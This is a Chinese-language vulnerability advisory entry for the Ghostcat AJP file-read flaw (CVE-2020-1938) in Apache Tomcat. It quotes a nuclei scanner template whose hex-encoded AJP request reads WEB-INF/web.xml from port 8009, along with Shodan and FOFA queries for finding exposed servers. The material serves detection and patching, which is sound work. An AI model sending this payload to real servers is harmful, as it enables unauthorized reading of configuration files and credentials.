Apache Tomcat AJP File Read/Inclusion Vulnerability

漏洞信息

漏洞名称： Apache Tomcat AJP File Read/Inclusion Vulnerability

漏洞编号：

• CVE： CVE-2020-1938

• CNVD： CNVD-2020-10487

漏洞类型： 文件读取

漏洞等级： 严重

漏洞描述： Ghostcat漏洞（CVE-2020-1938）是Apache Tomcat服务器中的一个严重安全漏洞，影响版本包括9.0.0.M1至9.0.0.30、8.5.0至8.5.50以及7.0.0至7.0.99。Apache Tomcat是一个广泛使用的开源Java Servlet容器，用于部署和运行Java Web应用程序。此漏洞的根源在于Apache JServ协议（AJP）的默认配置问题，AJP连接被赋予过高的信任级别，而默认情况下AJP连接器在所有配置的IP地址上监听。攻击者可以利用此漏洞读取或包含Web应用程序中的任意文件，甚至在某些条件下实现远程代码执行。具体来说，如果攻击者能够上传文件到Web应用程序或通过其他方式控制Web应用程序的内容，他们可以利用此漏洞将上传的文件作为JSP处理，从而实现远程代码执行。此漏洞的利用不需要认证，且可以自动化执行，因此对受影响系统的安全构成了严重威胁。建议用户升级到Apache Tomcat 9.0.31、8.5.51或7.0.100及以上版本，或禁用不必要的AJP连接器以缓解此漏洞。

产品厂商： Apache

产品名称： Apache Tomcat

影响版本： 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99

搜索语法： title=”apache tomcat”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/5288bea871d90346cf385e92ed30c3a5882d37f7/network%2Fcves%2F2020%2FCVE-2020-1938.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2020-1938

info:
  name: Ghostcat - Apache Tomcat - AJP File Read/Inclusion Vulnerability
  author: milo2012
  severity: critical
  description: When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.
  impact: |
    This vulnerability can lead to unauthorized access to sensitive information, such as configuration files, source code, or credentials.
  remediation: https://access.redhat.com/solutions/4851251
  reference:
    - https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487
    - https://nvd.nist.gov/vuln/detail/CVE-2020-1938
    - https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E
    - https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d@%3Cnotifications.ofbiz.apache.org%3E
    - http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-1938
    cwe-id: CWE-269
    epss-score: 0.94469
    epss-percentile: 0.99995
    cpe: cpe:2.3:a:apache:geode:1.12.0:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    vendor: apache
    product: geode
    shodan-query:
      - title:"Apache Tomcat"
      - http.title:"apache tomcat"
    fofa-query: title="apache tomcat"
    google-query: intitle:"apache tomcat"
  tags: cve,cve2020,kev,tenable,apache,lfi,network,tomcat,ajp,tcp

tcp:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:8009"
    inputs:
      - data: "{{hex_decode('1234020e02020008485454502f312e310000132f6578616d706c65732f78787878782e6a73700000093132372e302e302e3100ffff00093132372e302e302e31000050000009a006000a6b6565702d616c69766500000f4163636570742d4c616e677561676500000e656e2d55532c656e3b713d302e3500a00800013000000f4163636570742d456e636f64696e67000013677a69702c206465666c6174652c207364636800000d43616368652d436f6e74726f6c0000096d61782d6167653d3000a00e00444d6f7a696c6c612f352e3020285831313b204c696e7578207838365f36343b2072763a34362e3029204765636b6f2f32303130303130312046697265666f782f34362e30000019557067726164652d496e7365637572652d52657175657374730000013100a001004a746578742f68746d6c2c6170706c69636174696f6e2f7868746d6c2b786d6c2c6170706c69636174696f6e2f786d6c3b713d302e392c696d6167652f776562702c2a2f2a3b713d302e3800a00b00093132372e302e302e31000a00216a617661782e736572766c65742e696e636c7564652e726571756573745f7572690000012f000a001f6a617661782e736572766c65742e696e636c7564652e706174685f696e666f0000102f5745422d494e462f7765622e786d6c000a00226a617661782e736572766c65742e696e636c7564652e736572766c65745f706174680000012f00ff')}}"

    read-size: 1024
    matchers:
      - type: word
        words:
          - "See the NOTICE file distributed with"
# digest: 4a0a0047304502205ae5556991b044128ba5f41d0fdf612bc9477bc4334c3be2b8c71b519a613fd2022100e11b38470d922b9810e9bc318e4d6ebe2fa33974b298365f110a02545d7e153b:922c64590222798bb761d5b6d8e72950